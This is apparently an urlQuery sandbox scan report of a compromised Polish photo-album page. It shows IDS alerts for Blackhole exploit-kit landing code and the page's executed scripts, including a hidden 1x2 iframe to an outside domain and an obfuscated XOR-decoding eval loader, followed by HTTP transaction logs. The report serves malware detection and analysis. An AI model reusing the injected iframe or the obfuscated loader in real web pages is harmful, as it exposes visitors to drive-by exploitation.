Overview

URLhttp://nawroccy.com/basia/45_zaniemysl
IP79.96.51.252
ASNAS12824 home.pl sp. z o.o.
Location Poland
Report completed2012-11-05 19:50:14 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-05 19:49:40 79.96.51.252 urlQuery Client2ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding
2012-11-05 19:49:40 79.96.51.252 urlQuery Client2ET CURRENT_EVENTS Blackhole Landing try catch try catch math eval Aug 27 2012
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 79.96.51.252

Date Alerts / IDS URL IP
2013-02-09 09:22:170 / 4http://nawroccy.com/basia/20_kumple79.96.51.252
2012-12-07 09:18:270 / 3http://nawroccy.com/79.96.51.252
2012-12-07 05:30:450 / 2http://nawroccy.com/basia/16_wanna79.96.51.252
2012-12-07 05:21:020 / 2http://nawroccy.com/zakopane/1079.96.51.252
2012-12-07 05:19:420 / 2http://nawroccy.com/basia/18_tata79.96.51.252
2012-12-07 05:17:480 / 2http://nawroccy.com/basia/36_sylwester79.96.51.252

Last 6 reports on ASN: AS12824 home.pl sp. z o.o.

Date Alerts / IDS URL IP
2013-04-04 15:21:531 / 7http://serwerglowatka.home.pl/banner6qn/bar/index.html188.128.158.219
2013-04-04 15:16:181 / 2http://pckzjawor.pl/89.161.132.40
2013-04-04 13:18:021 / 2http://pckzjawor.pl/89.161.132.40
2013-04-04 11:22:491 / 2http://www.naszsad.home.pl/index.php?page=shop.product_details79.96.47.191
2013-04-04 11:15:161 / 8http://effect.home.pl/index.html79.96.140.171
2013-04-04 10:38:091 / 2http://4con.pl/89.161.237.66

Last 6 reports on domain: nawroccy.com

Date Alerts / IDS URL IP
2013-02-09 09:22:170 / 4http://nawroccy.com/basia/20_kumple79.96.51.252
2012-12-07 09:18:270 / 3http://nawroccy.com/79.96.51.252
2012-12-07 05:30:450 / 2http://nawroccy.com/basia/16_wanna79.96.51.252
2012-12-07 05:21:020 / 2http://nawroccy.com/zakopane/1079.96.51.252
2012-12-07 05:19:420 / 2http://nawroccy.com/basia/18_tata79.96.51.252
2012-12-07 05:17:480 / 2http://nawroccy.com/basia/36_sylwester79.96.51.252



JavaScript

Executed Scripts (18)


Executed Evals (4)

#1 JavaScript::Eval (size: 19, repeated: 1) 

String.fromCharCode

#2 JavaScript::Eval (size: 106, repeated: 1) 

document.write('<iframe src="http://trughtsa.com/" width=1 height=2></iframe>');
nczxu = "NaN";
tqfjm = "NaN";

#3 JavaScript::Eval (size: 716, repeated: 1) 

function slxtoy() {
    lsymm = Math.PI;
    ybwn = parseInt;
    vvwvac = 'length';
    oxo = ybwn(~ ((lsymm & lsymm) | (~lsymm & lsymm) & (lsymm & ~lsymm) | (~lsymm & ~lsymm)));
    ywfh = ybwn(((oxo & oxo) | (~oxo & oxo) & (oxo & ~oxo) | (~oxo & ~oxo)) & 1);
    xss = ywfh << ywfh;
    tqfjm = oxo;
    tqfjm = oxo;
    nczxu = '';
    mlfxnx = eval(unescape('%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65'));
    kxpbkr = eval;
    for (xcikkl = oxo; xcikkl < lfnu[vvwvac]; xcikkl -= -ywfh) tqfjm += lfnu.charCodeAt(xcikkl);
    tqfjm %= unescape(oxo + unescape('x') + (1 << 6));
    for (xcikkl = oxo; xcikkl < cq[vvwvac]; xcikkl += xss) nczxu += mlfxnx(ybwn(oxo + unescape('x') + cq.charAt(xcikkl) + cq.charAt(xcikkl + ybwn(ywfh))) ^ tqfjm);
    try {
        kxpbkr(nczxu);
    } catch (e) {
        try {
            eval(nczxu);
        } catch (e) {
            window.location = '/';
        }
    }
}
try {
    eval('slxtoy();')
} catch (e) {
    alert('err');
}

#4 JavaScript::Eval (size: 9, repeated: 1) 

slxtoy();

Executed Writes (3)

#1 JavaScript::Write (size: 61, repeated: 1) 

<iframe src="http://trughtsa.com/" width=1 height=2></iframe>

#2 JavaScript::Write (size: 551, repeated: 1) 

<script src="http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-teaminternet-rs&domain_name=internetcountercheck.com&hl=de&adtest=off&afdt=AG06ipAOokVq6l7xMQ0EnsOGT3iw3Ib9mgoTCO3535W_uLMCFQZdzAodwB0AxRgDIABQlY6iAVCqj6IBUKmFvw5QyLrcD1C1q_YPUMGOzhVQt73lFlCDnK0pULucrSlQv6__Q2iVjqIBaKqPogFxvLw_fx-Yo2I&s=internetcountercheck.com&num_ads=0&num_radlinks=35&dt=1352141381348&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=0&ref=http%3A%2F%2Finternetcountercheck.com%2F%3Fclick%3D11330312"></script>

#3 JavaScript::Write (size: 427, repeated: 1) 

<script src="http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-teaminternet02_3ph&domain_name=internetcountercheck.com&hl=de&channel=002544%2Cbucket030%2Cbucket050&adtest=off&s=internetcountercheck.com&num_ads=0&num_radlinks=0&dt=1352141381268&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=0&ref=http%3A%2F%2Finternetcountercheck.com%2F%3Fclick%3D11330312"></script>


HTTP Transactions (30)


Request Response 
GET /basia/45_zaniemysl HTTP/1.1

Host: nawroccy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 301 Moved

Content-Type: text/html

Connection: Keep-Alive
Content-Length: 195
Date: Mon, 05 Nov 2012 18:49:40 GMT
Location: http://nawroccy.com/basia/45_zaniemysl/
Server: IdeaWebServer/v0.80
GET /basia/45_zaniemysl/ HTTP/1.1

Host: nawroccy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Connection: Keep-Alive
Content-Length: 2311
Date: Mon, 05 Nov 2012 18:49:40 GMT
Last-Modified: Wed, 28 Oct 2009 21:37:34 GMT
Server: IdeaWebServer/v0.80
GET /?click=11330312 HTTP/1.1

Host: internetcountercheck.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://nawroccy.com/basia/45_zaniemysl/
 
HTTP/1.1 200 

HTTP/1.1 200 

Server: nginx
Date: Mon, 05 Nov 2012 18:49:40 GMT
Content-Length: 2335
Connection: keep-alive
x-check: 3c12dc4d54f8e22d666785b733b0052100c53444
Content-Encoding: gzip
GET /themes/saledefault.css HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.0 200 OK

Content-Type: text/css

Content-Length: 888
Connection: keep-alive
Server: nginx
Date: Wed, 25 Jul 2012 16:12:23 GMT
Last-Modified: Wed, 20 Jun 2012 13:15:09 GMT
Content-Encoding: gzip
Expires: Wed, 25 Jul 2012 17:12:23 GMT
Cache-Control: max-age=3600, public
Vary: Accept-Encoding
Age: 350
X-Amz-Cf-Id: WJSeHDBT6JnxX5NM_LtToAb-oaSLEI7P2hyEfvuYVHH58N5_kE7gWg==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /themes/cleanblack/style.css HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.0 200 OK

Content-Type: text/css

Content-Length: 2438
Connection: keep-alive
Server: nginx
Date: Mon, 11 Jun 2012 13:24:48 GMT
Last-Modified: Wed, 06 Jun 2012 11:09:15 GMT
Content-Encoding: gzip
Expires: Mon, 11 Jun 2012 14:24:48 GMT
Cache-Control: max-age=3600, public
Vary: Accept-Encoding
Age: 2513
X-Amz-Cf-Id: ElzO3io1WW9SADunTu9l3HZyjIRx7Zlo6tykEIscQDjFvHoaKRoFxA==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /scripts/js5t.js HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.0 200 OK

Content-Type: application/x-javascript

Content-Length: 4954
Connection: keep-alive
Server: nginx
Date: Tue, 30 Oct 2012 12:30:02 GMT
Last-Modified: Tue, 30 Oct 2012 12:36:57 GMT
Content-Encoding: gzip
Expires: Tue, 30 Oct 2012 13:30:02 GMT
Cache-Control: max-age=3600, public
Vary: Accept-Encoding
Age: 1109
X-Amz-Cf-Id: 5v2bPLzfUu8cxtv6fo2Kd7YVpJVU-f-lI3o4v6L76gm87jWUK-a5FQ==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /apps/domainpark/show_afd_ads.js?rs_1352141380832 HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT
Date: Mon, 05 Nov 2012 18:49:40 GMT
Expires: Tue, 06 Nov 2012 18:49:40 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: domainserver
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
Transfer-Encoding: chunked
GET /apps/domainpark/show_afd_ads.js?ads_1352141380832 HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT
Date: Mon, 05 Nov 2012 18:49:40 GMT
Expires: Tue, 06 Nov 2012 18:49:40 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: domainserver
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
Transfer-Encoding: chunked
GET /css?family=Ubuntu HTTP/1.1

Host: fonts.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/css

Expires: Mon, 05 Nov 2012 18:49:40 GMT
Date: Mon, 05 Nov 2012 18:49:40 GMT
Cache-Control: private, max-age=86400
Content-Length: 214
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /basia/45_zaniemysl/45_zaniemysl.jpg HTTP/1.1

Host: nawroccy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://nawroccy.com/basia/45_zaniemysl/
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Connection: Keep-Alive
Content-Length: 108428
Date: Mon, 05 Nov 2012 18:49:40 GMT
Last-Modified: Wed, 25 Jul 2007 06:04:38 GMT
Server: IdeaWebServer/v0.80
GET /favicon.ico HTTP/1.1

Host: nawroccy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Connection: Keep-Alive
Content-Length: 182
Date: Mon, 05 Nov 2012 18:49:41 GMT
Server: IdeaWebServer/v0.80
GET /?click=11330312 HTTP/1.1

Host: internetcountercheck.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/html

Server: nginx
Date: Mon, 05 Nov 2012 18:49:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
x-check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanBlack_twoclick
Content-Encoding: gzip
GET /themes/cleanblack/style.css HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
If-Modified-Since: Wed, 06 Jun 2012 11:09:15 GMT
 
HTTP/1.0 304 Not Modified

HTTP/1.0 304 Not Modified

Connection: keep-alive
Date: Mon, 05 Nov 2012 18:49:41 GMT
Cache-Control: max-age=3600, public
Expires: Mon, 11 Jun 2012 14:24:48 GMT
Last-Modified: Wed, 06 Jun 2012 11:09:15 GMT
Vary: Accept-Encoding
Age: 2514
X-Amz-Cf-Id: aBMKOYO1mxHdAaaGifudPZLpUEg74Ht-3UJJVVA6NLDn5GF-2YBbHw==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /scripts/js3t.js HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.0 200 OK

Content-Type: application/x-javascript

Content-Length: 4955
Connection: keep-alive
Server: nginx
Date: Tue, 30 Oct 2012 12:31:49 GMT
Last-Modified: Tue, 30 Oct 2012 12:36:57 GMT
Content-Encoding: gzip
Expires: Tue, 30 Oct 2012 13:31:49 GMT
Cache-Control: max-age=3600, public
Vary: Accept-Encoding
Age: 2665
X-Amz-Cf-Id: MTY9_kYwOhFtVAil3oKgHUCTr0pa3g04jjdRlfGf1Ju1GB0I9SKOdw==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /themes/saledefault.css HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
If-Modified-Since: Wed, 20 Jun 2012 13:15:09 GMT
 
HTTP/1.0 304 Not Modified

HTTP/1.0 304 Not Modified

Connection: keep-alive
Date: Mon, 05 Nov 2012 18:49:41 GMT
Cache-Control: max-age=3600, public
Expires: Wed, 25 Jul 2012 17:12:23 GMT
Last-Modified: Wed, 20 Jun 2012 13:15:09 GMT
Vary: Accept-Encoding
Age: 351
X-Amz-Cf-Id: Z8CRUIM2ZW08e2vZt268cvC_VoBLyBemoROsrpGnDKW_HinAEFJToA==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /apps/domainpark/show_afd_ads.js?ads_50980a4528f7e HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT
Date: Mon, 05 Nov 2012 18:49:41 GMT
Expires: Tue, 06 Nov 2012 18:49:41 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: domainserver
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
Transfer-Encoding: chunked
GET /apps/domainpark/show_afd_ads.js?rs_50980a4528fb9 HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT
Date: Mon, 05 Nov 2012 18:49:41 GMT
Expires: Tue, 06 Nov 2012 18:49:41 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: domainserver
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
Transfer-Encoding: chunked
GET /track.php?domain=internetcountercheck.com&toggle=browserjs&uid=MTM1MjE0MTM4MS4xNjc2OmQ5MjM3YWIzNTI1MDBmY2JiNWRiZWEzMDMyYTUwMTRkMjBhNmVlZDk%3D HTTP/1.1

Host: internetcountercheck.com
GET /track.php?domain=internetcountercheck.com&amp;toggle=browserjs&amp;uid=MTM1MjE0MTM4MS4xNjc2OmQ5MjM3YWIzNTI1MDBmY2JiNWRiZWEzMDMyYTUwMTRkMjBhNmVlZDk%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: text/html

Server: nginx
Date: Mon, 05 Nov 2012 18:49:41 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-teaminternet02_3ph&domain_name=internetcountercheck.com&hl=de&channel=002544%2Cbucket030%2Cbucket050&adtest=off&s=internetcountercheck.com&num_ads=0&num_radlinks=0&dt=1352141381268&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=0&ref=http%3A%2F%2Finternetcountercheck.com%2F%3Fclick%3D11330312 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&amp;output=js&amp;client=ca-dp-teaminternet02_3ph&amp;domain_name=internetcountercheck.com&amp;hl=de&amp;channel=002544%2Cbucket030%2Cbucket050&amp;adtest=off&amp;s=internetcountercheck.com&amp;num_ads=0&amp;num_radlinks=0&amp;dt=1352141381268&amp;u_tz=60&amp;u_his=2&amp;u_h=885&amp;u_w=1176&amp;frm=0&amp;ref=http%3A%2F%2Finternetcountercheck.com%2F%3Fclick%3D11330312 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
 
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=UTF-8

Content-Disposition: inline
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Mon, 05 Nov 2012 18:49:41 GMT
Server: domainserver
Cache-Control: private
Content-Length: 1428
X-XSS-Protection: 1; mode=block
GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-teaminternet-rs&domain_name=internetcountercheck.com&hl=de&adtest=off&afdt=AG06ipAOokVq6l7xMQ0EnsOGT3iw3Ib9mgoTCO3535W_uLMCFQZdzAodwB0AxRgDIABQlY6iAVCqj6IBUKmFvw5QyLrcD1C1q_YPUMGOzhVQt73lFlCDnK0pULucrSlQv6__Q2iVjqIBaKqPogFxvLw_fx-Yo2I&s=internetcountercheck.com&num_ads=0&num_radlinks=35&dt=1352141381348&u_tz=60&u_his=2&u_h=885&u_w=1176&frm=0&ref=http%3A%2F%2Finternetcountercheck.com%2F%3Fclick%3D11330312 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&amp;output=js&amp;client=ca-dp-teaminternet-rs&amp;domain_name=internetcountercheck.com&amp;hl=de&amp;adtest=off&amp;afdt=AG06ipAOokVq6l7xMQ0EnsOGT3iw3Ib9mgoTCO3535W_uLMCFQZdzAodwB0AxRgDIABQlY6iAVCqj6IBUKmFvw5QyLrcD1C1q_YPUMGOzhVQt73lFlCDnK0pULucrSlQv6__Q2iVjqIBaKqPogFxvLw_fx-Yo2I&amp;s=internetcountercheck.com&amp;num_ads=0&amp;num_radlinks=35&amp;dt=1352141381348&amp;u_tz=60&amp;u_his=2&amp;u_h=885&amp;u_w=1176&amp;frm=0&amp;ref=http%3A%2F%2Finternetcountercheck.com%2F%3Fclick%3D11330312 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
 
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=UTF-8

Content-Disposition: inline
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Mon, 05 Nov 2012 18:49:42 GMT
Server: domainserver
Cache-Control: private
Content-Length: 3590
X-XSS-Protection: 1; mode=block
GET /themes/sale/orange.png HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a3.cdnpark.com/themes/saledefault.css
 
HTTP/1.0 200 OK

Content-Type: image/png

Content-Length: 2840
Connection: keep-alive
Server: nginx
Date: Fri, 17 Aug 2012 05:59:37 GMT
Last-Modified: Wed, 06 Jun 2012 11:09:15 GMT
Expires: Fri, 17 Aug 2012 06:59:37 GMT
Cache-Control: max-age=3600, public
Accept-Ranges: bytes
Age: 3529
X-Amz-Cf-Id: MpzCjpD7fuS07vvEZZFFXwEHm66xg8qq1U9ffJQoW43zjFa4xyGbcQ==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /themes/cleanblack/img/bottom.png HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a3.cdnpark.com/themes/cleanblack/style.css
 
HTTP/1.0 200 OK

Content-Type: image/png

Content-Length: 3963
Connection: keep-alive
Server: nginx
Date: Thu, 01 Mar 2012 13:58:23 GMT
Last-Modified: Thu, 20 Oct 2011 07:57:56 GMT
Expires: Thu, 01 Mar 2012 14:58:23 GMT
Cache-Control: max-age=3600, public
Accept-Ranges: bytes
Age: 1634
X-Amz-Cf-Id: -13gwLGJSRUDETAy8ve-CN_MaviylMm25pdxpzFxElNB69cEYNawzA==
Via: 1.0 e02197b960267831d0310bdfb3750c9c.cloudfront.net:1182 (CloudFront), 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /themes/cleanblack/img/button.png HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a3.cdnpark.com/themes/cleanblack/style.css
 
HTTP/1.0 200 OK

Content-Type: image/png

Content-Length: 972
Connection: keep-alive
Server: nginx
